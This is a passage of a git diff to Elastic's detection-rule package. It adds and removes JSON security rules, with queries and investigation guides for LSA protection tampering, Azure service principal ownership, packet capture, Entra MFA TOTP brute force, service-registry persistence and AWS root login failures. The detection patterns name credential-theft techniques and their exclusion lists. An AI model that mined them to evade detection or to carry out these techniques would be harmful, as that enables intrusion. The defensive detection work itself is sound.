Lsa protection to access Lsass memory for credentials. This rule identifies RunAsPPL registry value modifications.\n\n#### Possible investigation steps\n\n- Verify the context of the change and if it's related to a planned system administration activity.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behaviors in the alert timeframe.\n- Investigate abnormal behaviors observed by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n\n### False positive analysis\n\n- Approved changes to relax Lsa protection for compatibility with third-party solutions such as authentication plugins or similar.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Restore the RunAsPPL registry value to the desired state.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "registry where host.os.type == \"windows\" and event.type == \"change\" and\n registry.data.strings != null and registry.value : \"RunAsPPL\" and\n registry.path : \"*\\\\SYSTEM\\\\*ControlSet*\\\\Control\\\\Lsa\\\\RunAsPPL\" and\n not registry.data.strings : (\"1\", \"0x00000001\", \"2\", \"0x00000002\")\n", + "references": [ + "https://learn.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^3.0.0" + }, + { + "package": "m365_defender", + "version": "^3.0.0" + }, + { + "package": "sentinel_one_cloud_funnel", + "version": "^1.0.0" + }, + { + "package": "crowdstrike", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.value", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "37cb6756-8892-4af3-a6bd-ddc56db0069d", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + 
"Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: SentinelOne", + "Data Source: Crowdstrike" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + }, + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.001", + "name": "Disable or Modify Tools", + "reference": "https://attack.mitre.org/techniques/T1562/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 3 + }, + "id": "37cb6756-8892-4af3-a6bd-ddc56db0069d_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/38e5acdd-5f20-4d99-8fe4-f0a1a592077f_103.json b/packages/security_detection_engine/kibana/security_rule/38e5acdd-5f20-4d99-8fe4-f0a1a592077f_103.json deleted file mode 100644 index 37a73905d22..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/38e5acdd-5f20-4d99-8fe4-f0a1a592077f_103.json +++ /dev/null @@ -1,77 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies when a user is added as an owner for an Azure service principal. The service principal object defines what the application can do in the specific tenant, who can access the application, and what resources the app can access. A service principal object is created when an application is given permission to access resources in a tenant. An adversary may add a user account as an owner for a service principal and use that account in order to define what an application can do in the Azure AD tenant.", - "from": "now-25m", - "index": [ - "filebeat-*", - "logs-azure*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "User Added as Owner for Azure Service Principal", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating User Added as Owner for Azure Service Principal\n\nAzure service principals are crucial for managing application permissions within a tenant, defining access and capabilities. Adversaries may exploit this by adding themselves as owners, gaining control over application permissions and access. 
The detection rule monitors audit logs for successful owner additions, flagging potential unauthorized changes to maintain security integrity.\n\n### Possible investigation steps\n\n- Review the audit log entry to confirm the event dataset is 'azure.auditlogs' and the operation name is \"Add owner to service principal\" with a successful outcome.\n- Identify the user account that was added as an owner and gather information about this account, including recent activity and any associated alerts.\n- Determine the service principal involved by reviewing its details, such as the application it is associated with and the permissions it holds.\n- Check the history of changes to the service principal to identify any other recent modifications or suspicious activities.\n- Investigate the context and necessity of the ownership change by contacting the user or team responsible for the service principal to verify if the change was authorized.\n- Assess the potential impact of the ownership change on the tenant's security posture, considering the permissions and access granted to the service principal.\n\n### False positive analysis\n\n- Routine administrative changes may trigger alerts when legitimate IT staff add themselves or others as owners for maintenance purposes. To manage this, create exceptions for known administrative accounts that frequently perform these actions.\n- Automated processes or scripts that manage service principal ownership as part of regular operations can cause false positives. Identify and document these processes, then exclude them from triggering alerts by using specific identifiers or tags.\n- Organizational changes, such as team restructuring, might lead to multiple legitimate ownership changes. During these periods, temporarily adjust the rule sensitivity or create temporary exceptions for specific user groups involved in the transition.\n- Third-party applications that require ownership changes for integration purposes can also trigger alerts. 
Verify these applications and whitelist their associated service principal changes to prevent unnecessary alerts.\n\n### Response and remediation\n\n- Immediately revoke the added user's ownership from the Azure service principal to prevent unauthorized access and control.\n- Conduct a thorough review of the affected service principal's permissions and access logs to identify any unauthorized changes or access attempts.\n- Reset credentials and update any secrets or keys associated with the compromised service principal to mitigate potential misuse.\n- Notify the security team and relevant stakeholders about the incident for awareness and further investigation.\n- Implement conditional access policies to restrict who can add owners to service principals, ensuring only authorized personnel have this capability.\n- Enhance monitoring and alerting for similar activities by increasing the sensitivity of alerts related to changes in service principal ownership.\n- Document the incident and response actions taken to improve future incident response and refine security policies.", - "query": "event.dataset:azure.auditlogs and azure.auditlogs.operation_name:\"Add owner to service principal\" and event.outcome:(Success or success)\n", - "references": [ - "https://docs.microsoft.com/en-us/azure/active-directory/develop/app-objects-and-service-principals" - ], - "related_integrations": [ - { - "package": "azure", - "version": "^1.0.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "azure.auditlogs.operation_name", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - } - ], - "risk_score": 21, - "rule_id": "38e5acdd-5f20-4d99-8fe4-f0a1a592077f", - "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "low", - "tags": [ - "Domain: Cloud", - "Data Source: Azure", - "Use Case: Configuration Audit", - "Tactic: Persistence", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0003", - "name": "Persistence", - "reference": "https://attack.mitre.org/tactics/TA0003/" - }, - "technique": [ - { - "id": "T1098", - "name": "Account Manipulation", - "reference": "https://attack.mitre.org/techniques/T1098/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 103 - }, - "id": "38e5acdd-5f20-4d99-8fe4-f0a1a592077f_103", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/393ef120-63d1-11ef-8e38-f661ea17fbce_5.json b/packages/security_detection_engine/kibana/security_rule/393ef120-63d1-11ef-8e38-f661ea17fbce_5.json index 5ec57f63c64..674cfa6083b 100644 --- a/packages/security_detection_engine/kibana/security_rule/393ef120-63d1-11ef-8e38-f661ea17fbce_5.json +++ b/packages/security_detection_engine/kibana/security_rule/393ef120-63d1-11ef-8e38-f661ea17fbce_5.json @@ -26,6 +26,13 @@ "https://www.sentinelone.com/labs/exploring-fbot-python-based-malware-targeting-cloud-and-payment-services/", "https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeInstances.html" ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "^4.0.0" + } + ], "risk_score": 21, "rule_id": "393ef120-63d1-11ef-8e38-f661ea17fbce", "severity": "low", diff --git 
a/packages/security_detection_engine/kibana/security_rule/3ad77ed4-4dcf-4c51-8bfc-e3f7ce316b2f_104.json b/packages/security_detection_engine/kibana/security_rule/3ad77ed4-4dcf-4c51-8bfc-e3f7ce316b2f_104.json deleted file mode 100644 index 31139baa28d..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/3ad77ed4-4dcf-4c51-8bfc-e3f7ce316b2f_104.json +++ /dev/null @@ -1,80 +0,0 @@ -{ - "attributes": { - "author": [ - "Austin Songer" - ], - "description": "Identifies potential full network packet capture in Azure. Packet Capture is an Azure Network Watcher feature that can be used to inspect network traffic. This feature can potentially be abused to read sensitive data from unencrypted internal traffic.", - "false_positives": [ - "Full Network Packet Capture may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Full Network Packet Capture from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "from": "now-25m", - "index": [ - "filebeat-*", - "logs-azure*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Azure Full Network Packet Capture Detected", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Azure Full Network Packet Capture Detected\n\nAzure's Packet Capture is a feature of Network Watcher that allows for the inspection of network traffic, useful for diagnosing network issues. However, if misused, it can capture sensitive data from unencrypted traffic, posing a security risk. Adversaries might exploit this to access credentials or other sensitive information. The detection rule identifies suspicious packet capture activities by monitoring specific Azure activity logs for successful operations, helping to flag potential misuse.\n\n### Possible investigation steps\n\n- Review the Azure activity logs to identify the specific user or service principal associated with the packet capture operation by examining the `azure.activitylogs.operation_name` and `event.dataset` fields.\n- Check the timestamp of the detected packet capture activity to determine the exact time frame of the event and correlate it with any other suspicious activities or changes in the environment.\n- Investigate the source and destination IP addresses involved in the packet capture to understand the scope and potential impact, focusing on any unencrypted traffic that might have been captured.\n- Verify the legitimacy of the packet capture request by contacting the user or team responsible for the operation to confirm if it was authorized and necessary for troubleshooting or other legitimate purposes.\n- Assess the risk of exposed sensitive data by identifying any critical systems or services that were part of the captured network traffic, especially those handling credentials or personal information.\n\n### False positive analysis\n\n- Routine network diagnostics by authorized personnel can trigger the rule. 
To manage this, create exceptions for specific user accounts or IP addresses known to perform regular diagnostics.\n- Automated network monitoring tools might initiate packet captures as part of their normal operations. Identify these tools and exclude their activities from triggering alerts.\n- Scheduled maintenance activities often involve packet captures for performance analysis. Document these schedules and configure the rule to ignore captures during these periods.\n- Development and testing environments may frequently use packet capture for debugging purposes. Exclude these environments by filtering based on resource tags or environment identifiers.\n- Legitimate security audits may involve packet capture to assess network security. Coordinate with the audit team to whitelist their activities during the audit period.\n\n### Response and remediation\n\n- Immediately isolate the affected network segment to prevent further unauthorized packet capture and potential data exfiltration.\n- Revoke any suspicious or unauthorized access to Azure Network Watcher and related resources to prevent further misuse.\n- Conduct a thorough review of the captured network traffic logs to identify any sensitive data exposure and assess the potential impact.\n- Reset credentials and access tokens for any accounts or services that may have been compromised due to exposed unencrypted traffic.\n- Implement network encryption protocols to protect sensitive data in transit and reduce the risk of future packet capture exploitation.\n- Escalate the incident to the security operations team for further investigation and to determine if additional security measures are necessary.\n- Enhance monitoring and alerting for Azure Network Watcher activities to detect and respond to similar threats more effectively in the future.", - "query": "event.dataset:azure.activitylogs and azure.activitylogs.operation_name:\n (\n MICROSOFT.NETWORK/*/STARTPACKETCAPTURE/ACTION or\n MICROSOFT.NETWORK/*/VPNCONNECTIONS/STARTPACKETCAPTURE/ACTION or\n MICROSOFT.NETWORK/*/PACKETCAPTURES/WRITE\n ) and\nevent.outcome:(Success or success)\n", - "references": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations" - ], - "related_integrations": [ - { - "integration": "activitylogs", - "package": "azure", - "version": "^1.0.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "azure.activitylogs.operation_name", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "3ad77ed4-4dcf-4c51-8bfc-e3f7ce316b2f", - "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "medium", - "tags": [ - "Domain: Cloud", - "Data Source: Azure", - "Tactic: Credential Access", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0006", - "name": "Credential Access", - "reference": "https://attack.mitre.org/tactics/TA0006/" - }, - "technique": [ - { - "id": "T1040", - "name": "Network Sniffing", - "reference": "https://attack.mitre.org/techniques/T1040/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 104 - }, - "id": "3ad77ed4-4dcf-4c51-8bfc-e3f7ce316b2f_104", - "type": "security-rule" -} \ No newline at end of file diff --git 
a/packages/security_detection_engine/kibana/security_rule/3fac01b2-b811-11ef-b25b-f661ea17fbce_2.json b/packages/security_detection_engine/kibana/security_rule/3fac01b2-b811-11ef-b25b-f661ea17fbce_2.json deleted file mode 100644 index 1eda6e4a39b..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/3fac01b2-b811-11ef-b25b-f661ea17fbce_2.json +++ /dev/null @@ -1,66 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies brute force attempts against Azure Entra multi-factor authentication (MFA) Time-based One-Time Password (TOTP) verification codes. This rule detects high frequency failed TOTP code attempts for a single user in a short time-span. Adversaries with valid credentials, when attempting to login to Azure portal or other Azure services, may be prompted to provide a TOTP code as part of the MFA process. If successful, adversaries can bypass MFA and gain unauthorized access to Azure resources.", - "false_positives": [ - "Based on the high-frequency threshold, it would be unlikely for a legitimate user to exceed the threshold for failed TOTP code attempts in a short time-span." - ], - "from": "now-9m", - "language": "esql", - "license": "Elastic License v2", - "name": "Azure Entra MFA TOTP Brute Force Attempts", - "note": "## Triage and analysis\n\n### Investigating Azure Entra MFA TOTP Brute Force Attempts\n\nThis rule detects high-frequency failed TOTP code attempts for a single user in a short time span. Such behavior could indicate an adversary attempting to bypass multi-factor authentication (MFA) protections using valid credentials. Understanding the context of the user's typical behavior and identifying anomalies in the log data are critical to determining the nature of the activity.\n\n#### Possible Investigation Steps:\n\n**Review the Source IP Address**:\n - Check the `source.ip` or `azure.signinlogs.caller_ip_address` field.\n - Determine if the IP address is associated with the user\u2019s typical login locations.\n - Look for unusual geographic patterns or anomalous IP addresses (e.g., proxies, VPNs, or locations outside the user\u2019s normal activity).\n\n**Analyze User Activity**:\n - Identify the user from the `azure.signinlogs.properties.sign_in_identifier` field.\n - Determine if the user is currently active from another device or session. 
Session hijacking could explain parallel activity with failed attempts.\n - Review past logs for the user to determine whether MFA failures or other anomalies are consistent or new.\n\n**Inspect the Authentication Method**:\n - Evaluate the `azure.signinlogs.properties.mfa_detail.auth_method` field: `OATH verification code`.\n - Confirm if the user typically uses TOTP codes or another MFA method (e.g., push notifications).\n - Verify if there are any recent changes to the user\u2019s MFA settings that may explain multiple failed attempts.\n\n**Evaluate the User Agent**:\n - Check the `user_agent.original` field.\n - Identify if the user agent matches a typical browser or a potentially malicious script (e.g., Python-based).\n - Look for deviations in operating system or browser versions from the user\u2019s normal activity.\n\n**Analyze Conditional Access Policies**:\n - Review the `azure.signinlogs.properties.applied_conditional_access_policies` for enforced grant controls.\n - Verify if MFA failures are tied to legitimate security policies (`display_name: Require multifactor authentication for admins`).\n\n**Correlate with Other Events**:\n - Search for other authentication attempts involving the same `azure.signinlogs.caller_ip_address`, `user_principal_name`, or `azure.signinlogs.properties.app_id`.\n - Look for suspicious activity patterns, such as password resets, privilege escalation, or account lockouts.\n\n\n#### False Positive Analysis:\n\n- **Unintentional User Behavior**:\n - Verify if the failed attempts could result from the user\u2019s unfamiliarity with TOTP codes or issues with device synchronization.\n - Check if the user recently switched MFA methods or devices, which could explain multiple failures.\n - Determine if this is whitebox testing or a developer testing MFA integration.\n\n- **Administrative Actions**:\n - Determine if the activity is related to legitimate administrative testing or configuration changes in the MFA system.\n\n#### Response and Remediation:\n\n- **Immediate Actions**:\n - If proven malicious, lock the affected account temporarily to prevent further unauthorized attempts.\n - Notify the user of suspicious activity and validate their access to the account.\n - Reset passwords and MFA settings for the affected user to prevent unauthorized access while communicating with the user.\n\n- **Strengthen Authentication Policies**:\n - Ensure conditional access policies are configured to monitor and restrict anomalous login behavior.\n - Consider a different MFA method or additional security controls to prevent future bypass attempts.\n\n- **Monitor and Audit**:\n - Implement additional monitoring to track high-frequency authentication failures across the environment.\n - Audit historical logs for similar patterns involving other accounts to identify broader threats.\n\n- **Educate and Train Users**:\n - Provide guidance on the secure use of MFA and the importance of recognizing and reporting suspicious activity.\n", - "query": "from logs-azure.signinlogs* metadata _id, _version, _index\n| where\n // filter for Entra Sign-In Logs\n event.dataset == \"azure.signinlogs\"\n and azure.signinlogs.operation_name == \"Sign-in activity\"\n\n // filter for MFA attempts with OATH conditional access attempts or TOTP\n and azure.signinlogs.properties.authentication_requirement == \"multiFactorAuthentication\"\n and azure.signinlogs.properties.mfa_detail.auth_method == \"OATH verification code\"\n\n // filter on failures only from brute-force attempts\n and 
azure.signinlogs.properties.conditional_access_status == \"failure\"\n and azure.signinlogs.result_description == \"Authentication failed during strong authentication request.\"\n| keep azure.signinlogs.properties.sign_in_identifier\n| stats\n // aggregate by the sign-in account or principal\n failed_totp_code_attempts = count(*) by azure.signinlogs.properties.sign_in_identifier\n| where\n // filter on high frequency for a single user\n failed_totp_code_attempts > 30\n", - "references": [ - "https://www.oasis.security/resources/blog/oasis-security-research-team-discovers-microsoft-azure-mfa-bypass", - "https://learn.microsoft.com/en-us/entra/identity/", - "https://learn.microsoft.com/en-us/entra/identity/monitoring-health/concept-sign-ins" - ], - "risk_score": 47, - "rule_id": "3fac01b2-b811-11ef-b25b-f661ea17fbce", - "setup": "#### Required Azure Entra Sign-In Logs\nThis rule requires the Azure logs integration be enabled and configured to collect all logs, including sign-in logs from Entra. In Entra, sign-in logs must be enabled and streaming to the Event Hub used for the Azure logs integration.\n", - "severity": "medium", - "tags": [ - "Domain: Cloud", - "Domain: SaaS", - "Data Source: Azure", - "Data Source: Entra ID", - "Data Source: Entra ID Sign-in", - "Use Case: Identity and Access Audit", - "Use Case: Threat Detection", - "Tactic: Credential Access", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0006", - "name": "Credential Access", - "reference": "https://attack.mitre.org/tactics/TA0006/" - }, - "technique": [ - { - "id": "T1110", - "name": "Brute Force", - "reference": "https://attack.mitre.org/techniques/T1110/", - "subtechnique": [ - { - "id": "T1110.001", - "name": "Password Guessing", - "reference": "https://attack.mitre.org/techniques/T1110/001/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "esql", - "version": 2 - }, - "id": "3fac01b2-b811-11ef-b25b-f661ea17fbce_2", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/3fac01b2-b811-11ef-b25b-f661ea17fbce_5.json b/packages/security_detection_engine/kibana/security_rule/3fac01b2-b811-11ef-b25b-f661ea17fbce_5.json index b06eed2e6d6..54cd168d1a4 100644 --- a/packages/security_detection_engine/kibana/security_rule/3fac01b2-b811-11ef-b25b-f661ea17fbce_5.json +++ b/packages/security_detection_engine/kibana/security_rule/3fac01b2-b811-11ef-b25b-f661ea17fbce_5.json @@ -18,6 +18,12 @@ "https://learn.microsoft.com/en-us/entra/identity/", "https://learn.microsoft.com/en-us/entra/identity/monitoring-health/concept-sign-ins" ], + "related_integrations": [ + { + "package": "azure", + "version": "^1.0.0" + } + ], "risk_score": 47, "rule_id": "3fac01b2-b811-11ef-b25b-f661ea17fbce", "setup": "#### Required Entra ID Sign-In Logs\nThis rule requires the Entra ID sign-in logs via the Azure integration be enabled. 
In Entra ID, sign-in logs must be enabled and streaming to the Event Hub used for the Entra ID logs integration.\n", diff --git a/packages/security_detection_engine/kibana/security_rule/403ef0d3-8259-40c9-a5b6-d48354712e49_315.json b/packages/security_detection_engine/kibana/security_rule/403ef0d3-8259-40c9-a5b6-d48354712e49_315.json new file mode 100644 index 00000000000..c473612c398 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/403ef0d3-8259-40c9-a5b6-d48354712e49_315.json @@ -0,0 +1,137 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies processes modifying the services registry key directly, instead of through the expected Windows APIs. This could be an indication of an adversary attempting to stealthily persist through abnormal service creation or modification of an existing service.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.registry-*", + "endgame-*", + "logs-windows.sysmon_operational-*", + "winlogbeat-*", + "logs-m365_defender.event-*", + "logs-sentinel_one_cloud_funnel.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Unusual Persistence via Services Registry", + "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Unusual Persistence via Services Registry\n\nWindows services are crucial for running background processes. Adversaries may exploit this by directly altering service registry keys to maintain persistence, bypassing standard APIs. The detection rule identifies such anomalies by monitoring changes to specific registry paths and filtering out legitimate processes, thus highlighting potential unauthorized service modifications indicative of malicious activity.\n\n### Possible investigation steps\n\n- Review the specific registry paths and values that triggered the alert, focusing on \"ServiceDLL\" and \"ImagePath\" within the specified registry paths to identify any unauthorized or suspicious modifications.\n- Examine the process responsible for the registry change, paying attention to the process name and executable path, to determine if it is a known legitimate process or potentially malicious.\n- Cross-reference the process executable path against the list of known legitimate paths excluded in the query to ensure it is not a false positive.\n- Investigate the historical behavior of the process and any associated files or network activity to identify patterns indicative of malicious intent or persistence mechanisms.\n- Check for any recent changes or anomalies in the system's service configurations that could correlate with the registry modifications, indicating potential unauthorized service creation or alteration.\n- Consult threat intelligence sources or databases to determine if the process or registry changes are associated with known malware or adversary techniques.\n\n### False positive analysis\n\n- Legitimate software installations or updates may modify service registry keys directly. Users can create exceptions for known software update processes by excluding their executables from the detection rule.\n- System maintenance tools like Process Explorer may trigger false positives when they interact with service registry keys. 
Exclude these tools by adding their process names and paths to the exception list.\n- Drivers installed by trusted hardware peripherals might alter service registry keys. Users should identify and exclude these driver paths if they are known to be safe and frequently updated.\n- Custom enterprise applications that require direct registry modifications for service management can be excluded by specifying their executable paths in the rule exceptions.\n- Regular system processes such as svchost.exe or services.exe are already excluded, but ensure any custom scripts or automation tools that mimic these processes are also accounted for in the exceptions.\n\n### Response and remediation\n\n- Isolate the affected system from the network to prevent further unauthorized access or lateral movement by the adversary.\n- Terminate any suspicious processes identified in the alert that are not part of legitimate applications or services.\n- Restore the modified registry keys to their original state using a known good backup or by manually correcting the entries to ensure the integrity of the service configurations.\n- Conduct a thorough scan of the affected system using updated antivirus and anti-malware tools to identify and remove any additional malicious software or artifacts.\n- Review and update endpoint protection policies to ensure that similar unauthorized registry modifications are detected and blocked in the future.\n- Escalate the incident to the security operations center (SOC) or incident response team for further analysis and to determine if additional systems are affected.\n- Document the incident details, including the steps taken for containment and remediation, to enhance future response efforts and update threat intelligence databases.", + "query": "registry where host.os.type == \"windows\" and event.type == \"change\" and\n registry.data.strings != null and registry.value : (\"ServiceDLL\", \"ImagePath\") and\n registry.path : (\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Services\\\\*\\\\ServiceDLL\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Services\\\\*\\\\ImagePath\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\ControlSet*\\\\Services\\\\*\\\\ServiceDLL\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\ControlSet*\\\\Services\\\\*\\\\ImagePath\",\n \"MACHINE\\\\SYSTEM\\\\ControlSet*\\\\Services\\\\*\\\\ServiceDLL\",\n \"MACHINE\\\\SYSTEM\\\\ControlSet*\\\\Services\\\\*\\\\ImagePath\"\n ) and not registry.data.strings : (\n \"?:\\\\windows\\\\system32\\\\Drivers\\\\*.sys\",\n \"\\\\SystemRoot\\\\System32\\\\drivers\\\\*.sys\",\n \"\\\\??\\\\?:\\\\Windows\\\\system32\\\\Drivers\\\\*.SYS\",\n \"\\\\??\\\\?:\\\\Windows\\\\syswow64\\\\*.sys\",\n \"system32\\\\DRIVERS\\\\USBSTOR\", \n \"system32\\\\drivers\\\\*.sys\", \n \"C:\\\\WindowsAzure\\\\GuestAgent*.exe\", \n \"\\\"C:\\\\Program Files\\\\Common Files\\\\McAfee\\\\*\", \n \"C:\\\\Program Files (x86)\\\\VERITAS\\\\VxPBX\\\\bin\\\\pbx_exchange.exe\", \n \"\\\"C:\\\\Program Files (x86)\\\\VERITAS\\\\VxPBX\\\\bin\\\\pbx_exchange.exe\\\"\",\n \"\\\"C:\\\\ProgramData\\\\McAfee\\\\Agent\\\\Current\\\\*\") and\n not (process.name : \"procexp??.exe\" and registry.data.strings : \"?:\\\\*\\\\procexp*.sys\") and\n not process.executable : (\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Windows\\\\winsxs\\\\*\\\\TiWorker.exe\",\n \"?:\\\\Windows\\\\System32\\\\drvinst.exe\",\n \"?:\\\\Windows\\\\System32\\\\services.exe\",\n \"?:\\\\Windows\\\\System32\\\\msiexec.exe\",\n 
\"?:\\\\Windows\\\\System32\\\\regsvr32.exe\",\n \"?:\\\\Windows\\\\System32\\\\WaaSMedicAgent.exe\", \n \"?:\\\\Windows\\\\UUS\\\\amd64\\\\WaaSMedicAgent.exe\"\n )\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^3.0.0" + }, + { + "package": "m365_defender", + "version": "^3.0.0" + }, + { + "package": "sentinel_one_cloud_funnel", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.value", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "403ef0d3-8259-40c9-a5b6-d48354712e49", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: SentinelOne", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1543", + "name": "Create or Modify System Process", + "reference": "https://attack.mitre.org/techniques/T1543/", + "subtechnique": [ + { + "id": "T1543.003", + "name": "Windows Service", + "reference": "https://attack.mitre.org/techniques/T1543/003/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 315 + }, + "id": "403ef0d3-8259-40c9-a5b6-d48354712e49_315", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/4d50a94f-2844-43fa-8395-6afbd5e1c5ef_211.json b/packages/security_detection_engine/kibana/security_rule/4d50a94f-2844-43fa-8395-6afbd5e1c5ef_211.json new file mode 100644 index 00000000000..ff8be22129c --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/4d50a94f-2844-43fa-8395-6afbd5e1c5ef_211.json @@ -0,0 +1,103 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies a high number of failed authentication attempts to the AWS management console for the Root user identity. An adversary may attempt to brute force the password for the Root user identity, as it has complete access to all services and resources for the AWS account.", + "false_positives": [ + "Automated processes that attempt to 